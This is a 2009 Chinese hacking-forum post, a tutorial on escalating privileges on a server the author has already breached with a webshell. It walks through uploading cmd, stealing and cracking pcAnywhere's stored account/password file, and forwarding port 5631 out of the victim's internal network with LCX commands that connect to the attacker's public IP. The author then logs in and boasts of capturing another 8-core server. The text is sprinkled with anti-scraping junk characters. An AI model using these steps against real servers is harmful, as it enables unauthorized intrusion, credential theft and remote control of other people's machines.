|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
9 j3 T. q5 O7 N2 Q: @$ s' m4 Z, M+ [% k$ s V: `5 g
提权方法:pcanywhere+LCX s+ h2 l& F7 q- }; m& G3 w
Z( a0 D: ^) U/ `9 H& Z
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
" ^8 E; B) J7 A4 {0 y' ^; w
; k5 v4 t. Z$ C/ V) T6 n在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。8 G8 k8 {3 E( ]- t, d
. t, P& W4 H* N* _ G
& r, T" o! ]9 X1 Q7 J9 y& L r查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。4 W8 B9 k+ x$ ] T
: h/ H: i% e. {" }6 I/ H
0 i/ B3 Q) I+ y7 N! b% b; r
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。$ _+ h! ^9 ^4 K1 L# U' [
0 N2 ^ X, _+ p
7 u; b$ F! P1 @+ G5 [! b, N% h8 @; D6 r, Z3 Q" j
# ^0 C/ K" M) x' F/ }3 B5 }* ^) @由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``0 ^8 x% y0 R! r: _; |( v
- \; W! t+ R0 T+ O8 j7 f
! o3 K. m3 Y8 yLCX的用法再简单说下:* v9 c' [6 f4 p ?
& V/ J- Y N$ V% v9 q5 B
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)6 x1 Q% `3 H! v5 c+ u% c) M/ C! H
+ b' G6 W* n; A+ L, N& o/ \# l' H本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)& l2 d8 M) Z5 a
2 z; X) p/ Q, D. m! L由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。1 ^! \! u! Y7 R4 R& G
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``5 G, K$ l; ~& d I$ K/ ?. g. B
$ k9 \+ z- U# S5 U+ W' s% B8 h* S
) d4 s' ^2 u# k9 h" V n7 g) p4 d
) y% S! m+ Z" u: |; p呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
|8 M8 k) ] F! w; S2 f# G f$ K- w, g9 G+ W6 O
- S" x& q/ r( c9 w q& I, w- z3 \/ p( r& t+ a6 ^/ Z
( R; ~' S/ \2 N& C' F
我们本地连接试试,输入我们刚破解的账号密码
: o% v- W t2 w: @6 [2 Y2 R9 c' a E) w' L( V0 W' y7 Q
6 d/ w3 J3 ^# j, I5 p) p呵呵``连接成功,服务器不错,又一个8核^︵^
9 ^ @: V( G9 }' ?$ N% K: W; J4 ~4 Q0 A# ^
( w# c" x7 p, l; Q) e( G: P7 u4 D* Y/ r) M
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
